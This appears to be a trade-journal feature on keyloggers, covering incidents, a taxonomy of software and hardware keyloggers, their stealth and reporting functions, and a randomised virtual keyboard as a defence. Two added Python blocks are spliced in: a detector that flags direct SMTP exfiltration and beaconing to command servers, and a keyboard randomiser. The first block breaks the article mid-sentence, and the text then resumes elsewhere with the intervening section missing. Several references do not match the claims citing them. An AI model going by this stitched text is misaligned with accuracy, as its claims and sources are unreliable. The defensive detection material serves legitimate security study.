Keyloggers: silent cyber security weapons

Dr Akashdeep Bhardwaj, Dr Sam Goundar

Network Security, February 2020 (Feature)

Cyber attackers are always seeking to design and push malicious software programs to unsuspecting users, to intentionally steal or cause damage and exploit data on end user systems. Malware types include spyware, keyloggers, rootkits and adware. In the past, script kiddies hacked computers to show off their skills and have fun. Today, hacking computers has become a huge cybercrime industry. Even as systems have improved in terms of both hardware and software, cyber attacks continue unabated.

The attacks have increased in complexity as well as impact. In May 2019, version 9 of the Hawk Eye malware surfaced, targeting business users.[1] The modus operandi of this malicious program has become a cybercrime standard. IBM's X-Force reported the IP address origin of Hawk Eye as being from Estonia, but it affected global users.[2] In March 2018, two hacker groups compromised Cathay Pacific Airlines.[3] One group installed a keylogger on Cathay's server console port and the other exploited the vulnerability. This led to the exposure of the personally identifiable information of 9.4 million Cathay passengers, including names, addresses, phone numbers, flight numbers, data, email addresses and membership numbers.[4] New malware is evolving at an incredible rate, with seemingly endless malicious threats in the form of trojans detected every day. In this research, the authors focus specifically on keylogger trojans. Such trojans share system resources with legitimate programs, living as silent residents inside the user systems and performing actions in a covert manner without attracting the attention of users.[5]

Keyloggers, in common with many trojans, are designed to mimic legitimate software and bypass anti-virus or anti-malware scanners.[6] To make matters worse, the privilege level at which keyloggers execute is higher than that of typical malware. This feature makes keyloggers almost impossible to detect and remove.[7] Keylogger trojans track keystrokes typed on the keyboard, record screen activities, scan systems for specific documents and send the information back to the hacker. Although the application of keyloggers per se is not illegal, their use is mostly related to malicious activities, as mentioned in Table 1.

Proposed taxonomy

The authors surveyed several research publications and industry implementations of keyloggers.[16-27] We propose that the taxonomy needs to be defined according to two criteria. The first is based on the location of execution and the second is based on the functionalities offered.

Depending on where within the user system the keylogger is set up and executed, we can define it as software- or hardware-based. Software keyloggers are installed as hidden applications by an attacker using social engineering methods. These entice users to click on email attachments or open links and download applications. These are primarily trojans, which in turn deploy the keylogger. Most keyloggers have predefined instructions, while the command and control (C&C) servers may supply further instructions.

The deployed application has the ability to hide itself from anti-malware scanners. These applications are designed to capture user keystrokes, monitor screenshots and transfer specific user documents based on commands issued by the attacker. Some keyloggers utilise API-based logging. In Microsoft Windows operating systems, kernel-based keyloggers execute hidden dynamic link libraries (DLLs) using hooking mechanisms. User actions,
such as pressing keys, are translated into Windows messages and pushed into the system message queue. These apps reside in the operating system kernel and intercept data directly from the keyboard controller interface. In case users employ an on-screen keyboard to type and submit data on web portals, screen recorder logging is utilised. Form-grabbing keyloggers capture form data instead of keystrokes when the user clicks the submit button. This data can typically include full name, email, address, phone numbers, mobile numbers, login credentials and payment card info.

Hardware keyloggers are small physical devices connected to the user system to capture data. These devices are installed on the system USB port, embedded in the system BIOS, connected between the I/O port and the keyboard, or use acoustics. They have built-in memory storage to store keystrokes. Usually these devices are undetectable by any known malware scanners, nor do they use the system disk to store the captured logs. Compared to software keyloggers, hardware keyloggers have one major disadvantage – these devices require physical access and installation on the user's system.

With the advent of touch screens, acoustic keyloggers transmit keystrokes using enhanced encoding schemes. This is performed by analysing the timing between various keystrokes and the frequency of repetition for similar acoustic signatures. However, this consumes system resources during data transmission.

| Sentiment | Keylogger use | Description |
| --- | --- | --- |
| Positive | Parental monitoring | Checking on the Internet browsing habits and activities of children and students to ensure cyber awareness and prevent them from being engaged in harmful activities.[8] |
| Positive | Improve employee productivity | The monitoring concept extends to checking on time spent by employees on social media or non-productive sites. This should, however, be done with the employees' consent and with proper policies in place for privacy and confidentiality.[9] |
| Positive | Investigate writing | Research has established keyloggers as an efficient tool for studies on cognitive writing processes (fluency and flow) as well as learning second languages.[10] |
| | Ethical hacking | Performing vulnerability assessment and penetration testing by deliberately exploiting user systems, then patching them to mitigate future threats.[11] |
| | Forensic investigations | Corporate, government and military espionage to perform intrusion detection and digital forensics for cybercrime investigations.[12] |
| Negative | Gather information | Logging and recording each and every keystroke from a target system keyboard is a simple process by which attackers can steal sensitive information such as payment card data, Social Security numbers and driver licence details, as well as two-factor authentication codes, passwords, email and bank credentials.[13] |
| Negative | Record screen | Performing visual surveillance and tracking file creation, updating or copy-paste operations on a target system by clicking and sending snapshots at regular periods.[14] |
| Negative | Identity theft | After gathering personally identifiable information (PII), carrying out economic and financial fraud. This has occurred on a large scale in recent times.[15] |

Table 1: Keylogger usage examples.

Functional groups

The authors grouped keylogger functionalities into five categories. The security functionality relates to how keyloggers become invisible to evade detection, hiding from Task Manager in order to perform their execution. This aspect also relates to protection of the logged files using encryption, automatically uninstalling and removing files at a predefined date or duration, hiding any registry entries or timestamps in system logs and sending log files to public SMTP servers, making them invisible to users.

The second aspect relates to the monitoring options present in the keylogger. These include intercepting system logon credentials, as well as keys pressed, including alphanumeric and special characters. File operations (create, copy, rename, update or delete) are logged. Copying from system memory or clipboard content is yet another advanced feature of many keyloggers. In fact, some keyloggers have been known to start and stop applications, including web cams, or even log off and shut down systems. Monitoring the print queue and the names of applications clicked via the mouse are some noteworthy monitoring features in high-end keyloggers. Some keyloggers even record mouse clicks as well as webcam and microphone audio.

The third aspect relates to monitoring the user's online activities. This includes gathering lists and screenshots of URLs and web portals accessed in various Internet browsers, generating lists of incoming and outgoing emails via the browser as well as email client applications, and capturing details of the user's messenger chats on Skype, Twitter, Facebook, ICQ and other social media clients.

Another critical feature is the reporting and filtering of logs sent to the attacker. This can be to a predefined set of C&C systems or an individual attacker. The reports typically contain the events, their duration for predefined applications as
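Two of the reporting behaviours listed above, log files pushed to public SMTP servers and reports delivered to C&C systems at regular intervals, leave traces in outbound connection records, which is where the Conclusion's advice to scan for traffic anomalies starts. The detector below is an added example, not code from the article: it reads constructed firewall-style log lines (the record format, addresses, relay list and thresholds are all assumptions) and flags direct SMTP from hosts that are not the mail relay, plus evenly spaced "beacon" flows to one destination.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound-connection records (firewall/proxy style), not taken from the article:
# 10.0.0.15 contacts a mail host every five minutes, 10.0.0.22 only browses irregularly.
SAMPLE_LOG = """\
2020-02-03T09:00:00 src=10.0.0.15 dst=203.0.113.9 dport=587
2020-02-03T09:00:02 src=10.0.0.15 dst=93.184.216.34 dport=443
2020-02-03T09:05:00 src=10.0.0.15 dst=203.0.113.9 dport=587
2020-02-03T09:07:41 src=10.0.0.15 dst=93.184.216.34 dport=443
2020-02-03T09:10:00 src=10.0.0.15 dst=203.0.113.9 dport=587
2020-02-03T09:15:00 src=10.0.0.15 dst=203.0.113.9 dport=587
2020-02-03T09:01:13 src=10.0.0.22 dst=93.184.216.34 dport=443
2020-02-03T09:33:50 src=10.0.0.22 dst=93.184.216.34 dport=443
2020-02-03T10:12:07 src=10.0.0.22 dst=93.184.216.34 dport=443
"""

LINE_RE = re.compile(r"(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")
MAIL_PORTS = {25, 465, 587}      # SMTP, SMTPS and message submission
MAIL_RELAYS = {"10.0.0.5"}       # assumption: the only host allowed to speak SMTP outbound

def parse(log_text):
    """Parse records into dicts with a datetime; lines that do not match are skipped."""
    rows = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append({"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
                         "dst": m["dst"], "dport": int(m["dport"])})
    return rows

def find_suspicious_flows(rows, min_hits=4, max_cv=0.1):
    """Return (kind, src, dst, dport) findings for two reporting patterns:
    'direct-smtp': a non-relay host connecting straight to a mail port;
    'beacon': at least min_hits connections to one destination whose inter-arrival
    times are near-constant (coefficient of variation below max_cv)."""
    flows = defaultdict(list)
    for r in rows:
        flows[(r["src"], r["dst"], r["dport"])].append(r["ts"])
    findings = []
    for (src, dst, dport), stamps in flows.items():
        if dport in MAIL_PORTS and src not in MAIL_RELAYS:
            findings.append(("direct-smtp", src, dst, dport))
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(stamps) >= max(min_hits, 2) and mean(gaps) > 0 and pstdev(gaps) / mean(gaps) < max_cv:
            findings.append(("beacon", src, dst, dport))
    return findings
```

On the sample records the 587/tcp flow from 10.0.0.15 is reported twice, once as direct SMTP and once as a 300-second beacon, while the browsing flows are left alone.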
keylogger trojans. The authors measured the typing time for each message for a set of 15 different users. Five messages with different lengths were selected, and Figure 8 illustrates the time taken for typing, which depends on the message length, for the different keyboards. From the above research and tests, the results reveal that the virtual layout takes about 50% longer as compared to the QWERTY keyboard with random spacing. However, the time is around 75% less when compared to the random layout.

[Figure 8: Comparing the proposed virtual keyboard with QWERTY and ABC keyboards.]

Conclusion

Like most cyber security threats, the only possible way to stay safe from keyloggers is regular scanning for any anomalies in outbound or inbound traffic, the use of anti-virus and anti-spyware scanners and, most importantly, user awareness. In this research, the authors demonstrated a successful keylogger technique, gathering keystrokes and screenshots along with online transactions, without any scanner being able to detect the activities. The proposed layout for virtual keyboards involves randomly exchanging vertically adjacent keys from the existing QWERTY layout, using random spacing. This can provide high accessibility and high security simultaneously.

About the authors

Dr Akashdeep Bhardwaj is currently professor of cyber security and digital forensics at University of Petroleum and Energy Studies (UPES), Dehradun, India. He has over 25 years of IT industry experience working for various US and UK organisations in cyber security, information security and IT management operation roles.

Dr Sam Goundar has been teaching information systems, information technology, management information systems and computer science over the past 25 years at several universities in a number of countries. He is a senior member of IEEE, a member of ACS, a member of the IITP, New Zealand, Certification Administrator of ETA-I, US and past president of the

References

1. Arghire, I. ‘Business users targeted by HawkEye keylogger malware’. Security Week, 28 May 2019. Accessed Jan 2020. www.securityweek.com/business-users-targeted-hawkeye-keylogger-malware.
2. Cook, J. ‘Cathay Pacific says data of 9.4 million passengers stolen in hack’. The Telegraph, 24 Oct 2018. Accessed Jan 2020. www.telegraph.co.uk/technology/2018/10/24/cathay-pacific-says-data-94-million-passengers-stolen-hack.
3. Mok, D. ‘Personal data of 9.4 million Cathay Pacific passengers leaked’. South China Morning Post, 24 Oct 2018. Accessed Jan 2020. www.scmp.com/news/hong-kong/transport/article/2170076/personal-data-some-94-million-passengers-cathay-pacific-and.
4. Wajahat, A; Imran, A; Latif, J; Nazir, A; Bilal, A. ‘A novel approach of unprivileged keyloggers detection’. Second IEEE International Conference on Computing, Mathematics and Engineering Technologies (iCoMET), Sukkur, Pakistan, 2019. DOI: 10.1109/ICOMET.2019.8673404.
5. Kuncoro, P; Kusuma, B. ‘Keyloggers is a hacking technique that allows threatening information on mobile banking user’. Third IEEE International Conference on Information Technology, Information System and Electrical Engineering (ICITISEE), Yogyakarta, Indonesia, 2018. DOI: 10.1109/ICITISEE.2018.8721028.
6. Javaheri, D; Hosseinzadeh, M; Rahmani, M. ‘Detection and elimination of spyware and ransomware by intercepting kernel-level system routines’. IEEE Access, Volume 6, 2018. DOI: 10.1109/ACCESS.2018.2884964.
7. Albabtain, Y; Yang, B. ‘The process of reverse engineering GPU malware and provide protection to GPUs’. 17th IEEE International Conference On Trust, Security and Privacy in Computing and Communications, and 12th IEEE International Conference on Big Data Science and Engineering (TrustCom/BigDataSE), New York, NY, US, 2018. DOI: 10.1109/TrustCom/BigDataSE.2018.00248.
8. Sukhram, D; Hayajneh, T. ‘Keystroke logs: are strong passwords enough?’. 8th IEEE Annual Ubiquitous Computing, Electronics and Mobile Communication Conference (UEMCON), New York, NY, US, 2017. DOI: 10.1109/UEMCON.2017.8249051.
9. Yewale, A; Singh, M. ‘Malware detection based on opcode frequency’. IEEE International Conference on Advanced Communication Control and Computing Technologies (ICACCCT), Ramanathapuram, India, 2016. DOI: 10.1109/ICACCCT.2016.7831719.
10. Solairaj, A; Prabanand, C; Mathalairaj, J; Prathap, C; Vignesh, L. ‘Keyloggers software detection techniques’. 10th IEEE International Conference on Intelligent Systems and Control (ISCO), Coimbatore, India, 2016. DOI: 10.1109/ISCO.2016.7726880.
11. Tasabeeh, A; Omer, A; Eldewahi, A. ‘Random multiple layouts: keyloggers prevention technique’. Conference of Basic Sciences and Engineering Studies (SGCAC), Khartoum, Sudan, 2016. DOI: 10.1109/SGCAC.2016.7457997.
12. Tekawade, N; Kshirsagar, S; Sukate, S; Raut, L; Vairagar, S. ‘Social engineering solutions for document generation using key-logger security mechanism and QR code’. Fourth IEEE International Conference on Computing Communication Control and Automation (ICCUBEA), Pune, India, 2018. DOI: 10.1109/ICCUBEA.2018.8697420.
13. Taekwang, J; Kim, G; Kempke, B; Henry, M; Chiotellis, N; Pfeiffer, C. ‘Circuit and system designs of ultra-low power sensor nodes with illustration in a miniaturized GNSS logger for position tracking: Part I – analog circuit techniques’. IEEE Transactions on Circuits and Systems I: Regular Papers, vol.64, 2017. DOI: 10.1109/TCSI.2017.2730600.
14. Wooguil, P; Youngrok, C; Sunki, Y. ‘High accessible virtual keyboards for preventing key-logging’. Eighth IEEE International Conference on Ubiquitous and Future Networks (ICUFN), Vienna, Austria, 2016. DOI: 10.1109/ICUFN.2016.7537017.
15. Tyagi, G; Ahmad, K; Doja, M. ‘A novel framework for password securing system from keylogger spyware’. IEEE International Conference on Issues and Challenges in Intelligent Computing Techniques (ICICT), Ghaziabad, India, 2014. DOI: 10.1109/ICICICT.2014.6781255.
16. Roland, M; Langer, J; Scharinger, J. ‘Practical attack scenarios on secure element enabled mobile devices’. Fourth International Workshop on Near Field Communication, 2012, pp.19-24.
17. Yunho, L. ‘An analysis on the vulnerability of secure keypads for mobile devices’. Journal of Korean Society for Internet Information, 2013, vol.14, no.3, pp.15-21.
18. Marpaung, J; Sain, M; Lee, HJ. ‘Survey on malware evasion techniques: state of the art and challenges’. 14th IEEE International Conference on Advanced Communication Technology (ICACT), 2012.
19. Kumar, S; Sehgal, R; Bhatia, J. ‘Hybrid honeypot framework for malware collection and analysis’. Seventh IEEE International Conference on Industrial and Information Systems (ICIIS), 2012.
20. Murugan, S; Kuppusamy, K. ‘System and methodology for unknown malware attack’. Second IEEE International Conference on Sustainable Energy and Intelligent System (SEISCON 2011).
21. Rosyid, N; Ohrui, M; Kikuchi, H; Sooraksat, P; Terada, P. ‘A discovery of sequential attack patterns of malware in botnets’. IEEE International Conference on Systems Man and Cybernetics (SMC), 2010.
22. Nassar, M; State, R; Festor, O. ‘VoIP malware: attack tool & attack scenarios’. IEEE ICC 2009.
23. Li, S; Schmitz, R. ‘A novel anti-phishing framework based on honeypots’. IEEE eCrime Researchers Summit (eCRIME 2009).
24. Hirano, M; Umeda, T; Okuda, T; Kawai, E; Yamaguchi, S. ‘T-PIM: Trusted password input method against data stealing malware’. Sixth ACM International Conference on Information Technology (ITNG 2009).
25. O’Donnell, A. ‘When malware attacks (anything but Windows)’. IEEE Security and Privacy Magazine, 2008.
26. Thonnard, O; Dacier, M. ‘A framework for attack patterns discovery in honeynet data’. Digital Investigation, 2008, vol.5, pp.128-139. Accessed Jan 2020. www.sciencedirect.com/science/article/pii/S1742287608000431.
27. Doja, M; Kumar, N. ‘Image authentication schemes against keylogger spyware’. Ninth ACM ACIS International Conference on Software Engineering, Artificial Intelligence, Networking, and Parallel/Distributed Computing (SNPD 2008).
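The randomised virtual keyboard the article proposes, QWERTY with vertically adjacent keys exchanged at random and random spacing between keys, as an added Python illustration that is not the authors' implementation; the swap probability, the blank-cell spacing, the seed helper and the click round-trip functions are assumptions chosen here to show why logged click positions are useless without the session's layout.

```python
import random

# Letter rows of the standard QWERTY layout, the basis the proposal starts from.
QWERTY_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm"]

def randomised_layout(rng, swap_prob=0.5, max_gap=2):
    """Build one session's virtual keyboard: each pair of vertically adjacent QWERTY keys
    is exchanged with probability swap_prob, then 0..max_gap blank cells are inserted
    before every key (random spacing). Returns rows of characters, '' marking a blank cell.
    swap_prob and max_gap are assumed parameters; the article gives no values."""
    rows = [list(r) for r in QWERTY_ROWS]
    for r in range(len(rows) - 1):                      # vertical neighbours share a column
        for i in range(min(len(rows[r]), len(rows[r + 1]))):
            if rng.random() < swap_prob:
                rows[r][i], rows[r + 1][i] = rows[r + 1][i], rows[r][i]
    spaced = []
    for row in rows:
        cells = []
        for ch in row:
            cells.extend([""] * rng.randint(0, max_gap))
            cells.append(ch)
        spaced.append(cells)
    return spaced

def layout_for_seed(seed, **kwargs):
    """Reproducible layout for tests; a live session should pass random.SystemRandom()
    to randomised_layout instead, so layouts are not predictable from a seed."""
    return randomised_layout(random.Random(seed), **kwargs)

def key_at(layout, row, col):
    """Character under a click at (row, col); None for a blank cell or out-of-range click."""
    if 0 <= row < len(layout) and 0 <= col < len(layout[row]):
        return layout[row][col] or None
    return None

def layout_is_permutation(layout):
    """True when every QWERTY letter appears exactly once, so the keyboard is fully usable."""
    return sorted(ch for row in layout for ch in row if ch) == sorted("".join(QWERTY_ROWS))

def click_positions(layout, text):
    """Cell coordinates a user clicks to enter text: all that a click or screen logger
    can record if it does not also hold the session's layout."""
    where = {ch: (r, c) for r, row in enumerate(layout) for c, ch in enumerate(row) if ch}
    return [where[ch] for ch in text]

def decode_clicks(layout, clicks):
    """Server-side reversal of click_positions with the layout issued for this session;
    replaying the same clicks against another session's layout gives a different string."""
    return "".join(key_at(layout, r, c) or "?" for r, c in clicks)
```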